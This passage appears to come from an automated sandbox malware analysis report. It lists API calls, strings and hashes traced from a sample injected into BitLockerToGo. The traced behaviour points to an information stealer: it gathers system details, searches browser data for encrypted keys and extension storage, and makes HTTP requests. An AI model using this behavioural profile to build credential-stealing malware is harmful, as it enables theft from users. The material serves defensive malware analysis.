                                                                                                                                                                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000000), ref: 008F2BC8
                                                                                                                                                                                                                                                                                                                    • RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,009178C8,?,?,?,008F5F8F,Processor: ,[Hardware],00917990,00000000,TimeZone: ,00917980,00000000,Local Time: ), ref: 008F2BE6
                                                                                                                                                                                                                                                                                                                    • RegQueryValueExA.KERNEL32(009178C8,00000000,00000000,00000000,000000FF,?,?,?,008F5F8F,Processor: ,[Hardware],00917990,00000000,TimeZone: ,00917980,00000000), ref: 008F2C02
                                                                                                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(009178C8,?,?,?,008F5F8F,Processor: ,[Hardware],00917990,00000000,TimeZone: ,00917980,00000000,Local Time: ,0091796C,Keyboard Languages: ,00917950), ref: 008F2C0B
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2669758364.00000000008E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_8e0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 3225020163-0
                                                                                                                                                                                                                                                                                                                    • Opcode ID: ef698c72c42fb2798e9d8552efe49a463aba92826b3a537b94e38b88db9feed6
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 0b48548efa6c87f1fb4ef9fd4d57053a941306c49efb081f9330e7c663be3253
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ef698c72c42fb2798e9d8552efe49a463aba92826b3a537b94e38b88db9feed6
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F0F05E75640208FFEB209B90DC0EFAE7A7DFB44B01F100124FB01E60A0EBB15A12DB60
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • GetEnvironmentVariableA.KERNEL32(C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,0000FFFF,?,?,?,?,?,?,?,?,?,?,008EEAFD), ref: 008E963B
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2143: lstrcpy.KERNEL32(00000000,00000000), ref: 008F2169
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F21A5: lstrlen.KERNEL32(?,?,008F9098,009177FE,00917787,?,?,?,?,008F9D6E), ref: 008F21AB
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F21A5: lstrcpy.KERNEL32(00000000,00000000), ref: 008F21DD
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2265: lstrlen.KERNEL32(?,?,?,008F8FD9,abc_,00000000,00917786,?,?,?,?,008F9D6E), ref: 008F2279
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2265: lstrcpy.KERNEL32(00000000,?), ref: 008F22A1
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2265: lstrcat.KERNEL32(?,00000000), ref: 008F22AC
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2223: lstrcpy.KERNEL32(00000000,?), ref: 008F2251
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2223: lstrcat.KERNEL32(?,?), ref: 008F225B
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F21E9: lstrcpy.KERNEL32(00000000,?), ref: 008F2219
                                                                                                                                                                                                                                                                                                                    • SetEnvironmentVariableA.KERNEL32(?,00918334,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,00917846,?,?,?,?,?,?,?,?,008EEAFD), ref: 008E9690
                                                                                                                                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,008EEAFD), ref: 008E96A4
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    • C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;, xrefs: 008E962F, 008E9634, 008E964E
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2669758364.00000000008E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_8e0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
                                                                                                                                                                                                                                                                                                                    • String ID: C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;
                                                                                                                                                                                                                                                                                                                    • API String ID: 2929475105-1843082770
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • __EH_prolog3_catch.LIBCMT ref: 008F8B1C
                                                                                                                                                                                                                                                                                                                    • lstrlen.KERNEL32(?,0000001C), ref: 008F8B27
                                                                                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,ERROR), ref: 008F8BAB
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2669758364.00000000008E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_8e0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: H_prolog3_catchlstrlen
                                                                                                                                                                                                                                                                                                                    • String ID: ERROR
                                                                                                                                                                                                                                                                                                                    • API String ID: 591506033-2861137601
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2143: lstrcpy.KERNEL32(00000000,00000000), ref: 008F2169
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F38A6: GetSystemTime.KERNEL32(?,00917807,?), ref: 008F38D5
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2265: lstrlen.KERNEL32(?,?,?,008F8FD9,abc_,00000000,00917786,?,?,?,?,008F9D6E), ref: 008F2279
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2265: lstrcpy.KERNEL32(00000000,?), ref: 008F22A1
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2265: lstrcat.KERNEL32(?,00000000), ref: 008F22AC
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2223: lstrcpy.KERNEL32(00000000,?), ref: 008F2251
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2223: lstrcat.KERNEL32(?,?), ref: 008F225B
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F21E9: lstrcpy.KERNEL32(00000000,?), ref: 008F2219
                                                                                                                                                                                                                                                                                                                    • CopyFileA.KERNEL32(?,?,00000001), ref: 008EC320
                                                                                                                                                                                                                                                                                                                    • lstrlen.KERNEL32(?), ref: 008EC472
                                                                                                                                                                                                                                                                                                                    • lstrlen.KERNEL32(?), ref: 008EC48D
                                                                                                                                                                                                                                                                                                                    • DeleteFileA.KERNEL32(?), ref: 008EC4DF
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2669758364.00000000008E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_8e0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 211194620-0
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 47e36b28c7d618974d32fac4c2b22e8a4aa6dbceb95f271bfa391042cb8941c2
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 5f25575e21f886763944b9ceb8bde9c237b0ae2a7f9399b037ba24e74c70d0a5
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 47e36b28c7d618974d32fac4c2b22e8a4aa6dbceb95f271bfa391042cb8941c2
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DF71933290015DABCF10FBAAED469DEBB75FF05305F110421FA00F7262DB71AE568A92
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2175: lstrcpy.KERNEL32(00000000,?), ref: 008F2194
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008E9148: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,008EF752,?,?,?), ref: 008E9163
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008E9148: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,008EF752,?,?,?), ref: 008E917A
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008E9148: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,008EF752,?,?,?), ref: 008E9191
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008E9148: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,008EF752,?,?,?), ref: 008E91A8
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008E9148: CloseHandle.KERNEL32(?,?,?,?,?,008EF752,?,?,?), ref: 008E91D0
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F3A7B: LocalAlloc.KERNEL32(00000040,00000001,?,?,?,008F8680,?), ref: 008F3A93
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2143: lstrcpy.KERNEL32(00000000,00000000), ref: 008F2169
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2265: lstrlen.KERNEL32(?,?,?,008F8FD9,abc_,00000000,00917786,?,?,?,?,008F9D6E), ref: 008F2279
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2265: lstrcpy.KERNEL32(00000000,?), ref: 008F22A1
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2265: lstrcat.KERNEL32(?,00000000), ref: 008F22AC
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F21E9: lstrcpy.KERNEL32(00000000,?), ref: 008F2219
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2223: lstrcpy.KERNEL32(00000000,?), ref: 008F2251
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2223: lstrcat.KERNEL32(?,?), ref: 008F225B
                                                                                                                                                                                                                                                                                                                    • StrStrA.SHLWAPI(00000000,?,00918700,0091796B), ref: 008EE492
                                                                                                                                                                                                                                                                                                                    • lstrlen.KERNEL32(?), ref: 008EE4A5
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2669758364.00000000008E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_8e0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: lstrcpy$File$AllocLocallstrcatlstrlen$CloseCreateHandleReadSize
                                                                                                                                                                                                                                                                                                                    • String ID: ^userContextId=4294967295$moz-extension+++
                                                                                                                                                                                                                                                                                                                    • API String ID: 161838763-3310892237
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 183029ba531ff80d1c1fad5990eafbbd0cb98df7ca0657f1435ead736793d751
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 942b1be3c14234ae03563e6ba93babf2073de045dd9a6e25caaf50ef9a982a5d
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 183029ba531ff80d1c1fad5990eafbbd0cb98df7ca0657f1435ead736793d751
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9441B53290015DABCF10FBBADD429DDBBB4FF49304B510520FE04F7262DA75AE598A92
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2175: lstrcpy.KERNEL32(00000000,?), ref: 008F2194
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008E688F: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 008E68F1
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008E688F: StrCmpCA.SHLWAPI(?), ref: 008E690B
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008E688F: InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 008E693A
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008E688F: HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 008E6979
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008E688F: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 008E69A9
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008E688F: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 008E69B4
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008E688F: HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 008E69D8
                                                                                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,ERROR), ref: 008F85C2
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2669758364.00000000008E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_8e0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: HttpInternet$OpenRequest$ConnectInfoOptionQuerySendlstrcpy
                                                                                                                                                                                                                                                                                                                    • String ID: ERROR$ERROR
                                                                                                                                                                                                                                                                                                                    • API String ID: 3086566538-2579291623
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • Sleep.KERNEL32(000003E8,?,?), ref: 008F8C4D
                                                                                                                                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,008F8B15,?,00000000,00000000), ref: 008F8C85
                                                                                                                                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 008F8C8D
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2669758364.00000000008E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_8e0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: CreateObjectSingleSleepThreadWait
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 4198075804-0
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,?,?,008F67CA), ref: 008F42A6
                                                                                                                                                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,00000000,008F67CA,008F67CA,00000000,?,?,?,008F67CA), ref: 008F42CD
                                                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,008F67CA), ref: 008F42E4
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2669758364.00000000008E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_8e0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: File$CloseCreateHandleWrite
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 1065093856-0
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • ?Startup@TimeStamp@mozilla@@SAXXZ.MOZGLUE ref: 6C973095
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C9735A0: InitializeCriticalSectionAndSpinCount.KERNEL32(6C9FF688,00001000), ref: 6C9735D5
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C9735A0: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_TIMESTAMP_MODE), ref: 6C9735E0
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C9735A0: QueryPerformanceFrequency.KERNEL32(?), ref: 6C9735FD
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C9735A0: _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,GenuntelineI,0000000C), ref: 6C97363F
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C9735A0: GetSystemTimeAdjustment.KERNEL32(?,?,?), ref: 6C97369F
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C9735A0: __aulldiv.LIBCMT ref: 6C9736E4
                                                                                                                                                                                                                                                                                                                    • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C97309F
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C995B50: QueryPerformanceCounter.KERNEL32(?,?,?,?,6C9956EE,?,00000001), ref: 6C995B85
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C995B50: EnterCriticalSection.KERNEL32(6C9FF688,?,?,?,6C9956EE,?,00000001), ref: 6C995B90
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C995B50: LeaveCriticalSection.KERNEL32(6C9FF688,?,?,?,6C9956EE,?,00000001), ref: 6C995BD8
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C995B50: GetTickCount64.KERNEL32 ref: 6C995BE4
                                                                                                                                                                                                                                                                                                                    • ?InitializeUptime@mozilla@@YAXXZ.MOZGLUE ref: 6C9730BE
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C9730F0: QueryUnbiasedInterruptTime.KERNEL32 ref: 6C973127
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C9730F0: __aulldiv.LIBCMT ref: 6C973140
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C9AAB2A: __onexit.LIBCMT ref: 6C9AAB30
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2699721657.000000006C971000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C970000, based on PE: true
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c970000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: Time$CriticalQuerySection$InitializePerformanceStamp@mozilla@@__aulldiv$AdjustmentCountCount64CounterEnterFrequencyInterruptLeaveNow@SpinStartup@SystemTickUnbiasedUptime@mozilla@@V12@___onexit_strnicmpgetenv
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 4291168024-0
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • OpenProcess.KERNEL32(00000410,00000000,008F5B27,00000000,?), ref: 008F3F03
                                                                                                                                                                                                                                                                                                                    • K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 008F3F1E
                                                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 008F3F25
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2669758364.00000000008E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_8e0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: CloseFileHandleModuleNameOpenProcess
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 3183270410-0
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,008E1375), ref: 008F28ED
                                                                                                                                                                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000000), ref: 008F28F4
                                                                                                                                                                                                                                                                                                                    • GetComputerNameA.KERNEL32(00000000,008E1375), ref: 008F2908
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2669758364.00000000008E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_8e0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: Heap$AllocateComputerNameProcess
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 1664310425-0
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2143: lstrcpy.KERNEL32(00000000,00000000), ref: 008F2169
                                                                                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,Opera GX,00917926,00917913,?,?,?), ref: 008ED918
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F3A18: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 008F3A59
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2223: lstrcpy.KERNEL32(00000000,?), ref: 008F2251
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2223: lstrcat.KERNEL32(?,?), ref: 008F225B
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F21E9: lstrcpy.KERNEL32(00000000,?), ref: 008F2219
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2265: lstrlen.KERNEL32(?,?,?,008F8FD9,abc_,00000000,00917786,?,?,?,?,008F9D6E), ref: 008F2279
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2265: lstrcpy.KERNEL32(00000000,?), ref: 008F22A1
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2265: lstrcat.KERNEL32(?,00000000), ref: 008F22AC
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2175: lstrcpy.KERNEL32(00000000,?), ref: 008F2194
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F39EE: GetFileAttributesA.KERNEL32(?,?,?,008EEA72,?,?,?), ref: 008F39F5
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008E93A4: StrStrA.SHLWAPI(00000000,"encrypted_key":",?,?,?,?,?,?), ref: 008E93EE
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008E93A4: lstrlen.KERNEL32(00000001,?,?,?,?,?,?), ref: 008E947F
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2669758364.00000000008E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_8e0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: lstrcpy$lstrcatlstrlen$AttributesFileFolderPath
                                                                                                                                                                                                                                                                                                                    • String ID: Opera GX
                                                                                                                                                                                                                                                                                                                    • API String ID: 729072150-3280151751
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 77b34a542cea5d69b0619e7664496db4ae1393f449e82a49c0aef6dcb11bb842
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 122717014df09f81163e8de180f114f97aace723267d678c5e199ac356eaeb5f
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 77b34a542cea5d69b0619e7664496db4ae1393f449e82a49c0aef6dcb11bb842
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D6C1A13290015DAACF10FBBADD429DDBB74FF45304F520421FE04B7262DA75AF5A8A92
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • VirtualProtect.KERNEL32(?,?,00000002,00000002,?,?,?,?,008E7B86,?), ref: 008E7ABA
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2669758364.00000000008E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_8e0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: ProtectVirtual
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 544645111-3916222277
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 2a7665745889e8edd8d58e2dfd9d5c3c3dd033a9926c7f4f392232933fbce618
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 08aef2ea5e3f0f382060546b1993ff626e3bf003153ec3bfee5be0a3d078a874
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2a7665745889e8edd8d58e2dfd9d5c3c3dd033a9926c7f4f392232933fbce618
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B911CE7151826AEFEB20CF96D588BADB7E4FB05388F2004389641C3280E774EF41DB60
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • std::_Xinvalid_argument.LIBCPMT ref: 008F03CC
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 00910478: std::exception::exception.LIBCMT ref: 0091048D
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 00910478: __CxxThrowException@8.LIBCMT ref: 009104A2
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 00910478: std::exception::exception.LIBCMT ref: 009104B3
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2669758364.00000000008E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_8e0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_
                                                                                                                                                                                                                                                                                                                    • String ID: string too long
